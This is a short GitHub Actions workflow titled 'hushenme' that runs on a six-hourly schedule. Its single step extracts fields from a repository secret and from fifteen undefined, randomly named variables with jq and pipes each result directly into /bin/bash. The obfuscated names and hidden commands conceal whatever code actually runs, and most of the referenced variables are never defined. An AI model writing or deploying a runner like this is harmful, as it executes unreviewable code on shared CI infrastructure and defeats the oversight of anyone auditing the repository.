name: hushenme
on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hushenme
        env:
          irl052: ${{ secrets.irl052 }}
        run: |
          echo $irl052 | jq -r .n36611 | /bin/bash
          echo $m0827 | jq -r .qalx179 | /bin/bash
          echo $zc26502 | jq -r .vx4 | /bin/bash
          echo $onc2390 | jq -r .m496 | /bin/bash
          echo $witga56 | jq -r .nw4 | /bin/bash
          echo $i6625 | jq -r .bzlfn5 | /bin/bash
          echo $ahotm86 | jq -r .ayb57 | /bin/bash
          echo $jd606 | jq -r .jk7 | /bin/bash
          echo $i7 | jq -r .nt8 | /bin/bash
          echo $cwkx7 | jq -r .ga6304 | /bin/bash
          echo $wulj6221 | jq -r .js8510 | /bin/bash
          echo $m879 | jq -r .edfz6589 | /bin/bash
          echo $he0942 | jq -r .ygg88 | /bin/bash
          echo $f3578 | jq -r .marfy094 | /bin/bash
          echo $llvql44 | jq -r .cq4045 | /bin/bash
          echo $fqxfp7 | jq -r .rrqog70 | /bin/bash

